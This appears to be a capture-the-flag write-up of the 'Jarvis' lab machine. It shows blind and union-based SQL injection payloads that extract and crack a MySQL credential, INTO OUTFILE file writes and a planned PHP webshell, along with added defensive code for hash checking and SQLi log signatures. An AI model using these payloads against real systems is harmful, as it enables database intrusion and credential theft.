SQLi


Two types of SQLi were confirmed from the earlier enumeration: both in-band and out-of-band, more specifically union-based and time-based.

In this page, I will attempt to perform data extraction and potentially file read/write and RCE as well (if the configured permissions allow it).

Blind


(SELECT SLEEP(3) FROM information_schema.schemata WHERE schema_name LIKE 'h%')#

The current database starts with the character “h”, likely hotel, considering the name of the website.

(SELECT SLEEP(3) FROM information_schema.schemata WHERE schema_name='hotel')#

Yep. It turns out to be just hotel.

(SELECT SLEEP(3) FROM information_schema.schemata WHERE schema_name='mysql')#

There is also the default database, mysql, as expected.

(SELECT SLEEP(3) FROM information_schema.tables WHERE table_schema='hotel' AND table_name LIKE 'r%')#

There is a table starting with the character “r” within the current DB, hotel. It’s likely room.

(SELECT SLEEP(3) FROM information_schema.tables WHERE table_schema='hotel' AND table_name='room')#

The table is room. I don’t think this table would contain any credentials, so I will try to get credentials from the mysql DB instead.

(SELECT SLEEP(3) FROM information_schema.columns WHERE table_schema='mysql' AND table_name='user' AND column_name='user')#

The mysql.user table has a column, user.

(SELECT SLEEP(3) FROM information_schema.columns WHERE table_schema='mysql' AND table_name='user' AND column_name='password')#

The mysql.user table also has the column, password.

(SELECT SLEEP(3) FROM mysql.user WHERE user LIKE 'D%')#

Interestingly, the default user, root, is not there. Instead, there is a username starting with the character “D”. Notice the capitalized character.

(SELECT SLEEP(3) FROM mysql.user WHERE user LIKE 'DB%')#

It’s followed by the character “B”, forming the word “DB”.

(SELECT SLEEP(3) FROM mysql.user WHERE user LIKE 'DBa%')#

It’s again followed by the character “a”. Is it admin?

(SELECT SLEEP(3) FROM mysql.user WHERE user LIKE 'DBadmin%')#

It may be DBadmin. The SQL query is still using the LIKE operator, so I need to confirm it with =.

(SELECT SLEEP(3) FROM mysql.user WHERE user='DBadmin')#

DBadmin is confirmed to be a valid user.

(SELECT SLEEP(3) FROM mysql.user WHERE user='DBadmin' AND password like '*%')#

The password hash starts with an asterisk character, “*”.

(SELECT SLEEP(3) FROM mysql.user WHERE user='DBadmin' AND password like '*2D2B7A5E4E637B8FBA1D17%')#

Manual enumeration of the SQL password hash is just an insane amount of work. I have got *2D2B7A5E4E637B8FBA1D17 so far.

(SELECT SLEEP(3) FROM mysql.user WHERE user='DBadmin' AND password='*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0')#

Password hash extracted for the DBadmin user: *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ hashcat -a 0 -m 300 DBadmin.hash /usr/share/wordlists/rockyou.txt   
hashcat (v6.2.6) starting
 
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
 
2d2b7a5e4e637b8fba1d17f40318f277d29964d0:imissyou         
 
session..........: hashcat
status...........: Cracked
hash.mode........: 300 (MySQL4.1/MySQL5)
hash.target......: 2d2b7a5e4e637b8fba1d17f40318f277d29964d0
time.started.....: Mon Jan 30 17:07:56 2023 (0 secs)
time.estimated...: Mon Jan 30 17:07:56 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:   602.2 kH/s (0.23ms) @ Accel:256 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 1536/14344385 (0.01%)
rejected.........: 0/1536 (0.00%)
restore.point....: 768/14344385 (0.01%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: football1 -> mexico1
hardware.mon.#1..: Util: 45%
 
started: Mon Jan 30 17:07:55 2023
stopped: Mon Jan 30 17:07:58 2023

Hashcat cracked the password hash: imissyou
dbadmin:imissyou
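Hashcat mode 300 is the legacy mysql_native_password scheme, a single unsalted SHA1(SHA1(password)), which is why it cracks so quickly. The following added example (not from the original writeup) recomputes that hash in Python to show the format and to verify the recovered password against the hash pulled from mysql.user; the hash and password are the ones shown above.

```python
import hashlib
import hmac

# Hash extracted from mysql.user above (DBadmin).
DBADMIN_HASH = "*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0"


def mysql41_hash(password: str) -> str:
    """MySQL 4.1+ / mysql_native_password hash: '*' + SHA1(SHA1(password)).

    The inner SHA1 is taken as raw bytes, the outer one is rendered as
    upper-case hex. There is no salt and no work factor, so one candidate
    costs two SHA1 calls, matching the ~600 kH/s hashcat reported on a CPU.
    """
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def verify(stored_hash: str, candidate: str) -> bool:
    """Compare a stored mysql.user hash with a candidate password.

    hashcat prints the hex without the leading '*' and in lower case, so
    normalise both sides before the constant-time comparison.
    """
    expected = mysql41_hash(candidate).lstrip("*").lower()
    return hmac.compare_digest(expected, stored_hash.lstrip("*").lower())


if __name__ == "__main__":
    print(mysql41_hash("imissyou"))          # *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
    print(verify(DBADMIN_HASH, "imissyou"))  # True
```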

Union


-1 UNION SELECT 1,2,3,4,5,6,7 #

It was discovered that the SQL query pulls data from 7 columns.

This is how the query is displayed.

-1 UNION SELECT 1,version(),3,user(),database(),6,7 #

The backend DB is hotel, running 10.1.37-MariaDB-0+deb9u1, and the query runs as the DBadmin user.

-1 UNION SELECT 1,user,3,password,host,6,7 FROM mysql.user #

Only a single credential was returned from the mysql.user table. The password hash for the DBadmin user is *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

Password Cracking


I can get the hash cracked through an online tool as well: dbadmin:imissyou

file write/read


I can write to files via SQLi through the INTO OUTFILE clause in MySQL. However, this can only be done if I have sufficient privileges, e.g. the root user. I will test it by writing something to the file /tmp/test.txt

-1 UNION SELECT 1,2,3,4,'This is a testing',6,7 INTO OUTFILE '/tmp/test.txt' #

Done. Now I can check it.

Reading files can be done via SQLi through the LOAD_FILE() function in MySQL. I will try to read the file that I just created at /tmp/test.txt

Confirmed! This means that I can write a simple PHP webshell to a file under the web root for ease of access.
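From the defender's side, every step in the blind, union and file write/read sections leaves a distinctive request in the web server log. The following added example (not part of the original writeup) runs signature matching over constructed Apache-style log lines that carry the same payloads walked through above; the endpoint /page.php?id= and the client IP are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format). The payloads are the
# ones used above, URL-encoded; the endpoint and IP are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Jan/2023:17:01:02 +0000] "GET /page.php?id=1 HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
10.0.0.5 - - [30/Jan/2023:17:01:09 +0000] "GET /page.php?id=(SELECT+SLEEP(3)+FROM+information_schema.schemata+WHERE+schema_name+LIKE+%27h%25%27)%23 HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
10.0.0.5 - - [30/Jan/2023:17:02:15 +0000] "GET /page.php?id=-1+UNION+SELECT+1,user,3,password,host,6,7+FROM+mysql.user+%23 HTTP/1.1" 200 2400 "-" "Mozilla/5.0"
10.0.0.5 - - [30/Jan/2023:17:03:40 +0000] "GET /page.php?id=-1+UNION+SELECT+1,2,3,4,%27This+is+a+testing%27,6,7+INTO+OUTFILE+%27/tmp/test.txt%27+%23 HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

# Signatures for the techniques seen on this page, checked against the decoded path.
SIGNATURES = [
    ("time-based blind", re.compile(r"\bsleep\s*\(", re.I)),
    ("union-based", re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\b|\bmysql\.user\b", re.I)),
    # INTO OUTFILE only works with the FILE privilege and a permissive secure_file_priv,
    # so a hit here is also a prompt to audit both settings on the database.
    ("file write", re.compile(r"\binto\s+outfile\b", re.I)),
    ("file read", re.compile(r"\bload_file\s*\(", re.I)),
]

REQ_LINE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')


def normalize(path: str) -> str:
    """URL-decode the request path and collapse whitespace and /**/ comment padding."""
    decoded = unquote_plus(path).replace("/**/", " ")
    return re.sub(r"\s+", " ", decoded)


def classify(path: str) -> list:
    """Return the technique labels whose signature matches the decoded path."""
    text = normalize(path)
    return [label for label, pattern in SIGNATURES if pattern.search(text)]


def scan_log(log: str) -> list:
    """Return (client_ip, labels) for every log line that matches at least one signature."""
    hits = []
    for line in log.splitlines():
        match = REQ_LINE.search(line)
        if not match:
            continue
        labels = classify(match.group("path"))
        if labels:
            hits.append((line.split()[0], labels))
    return hits


if __name__ == "__main__":
    for ip, labels in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(labels))
```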

I remember seeing an instance of PHPMyAdmin. I will continue there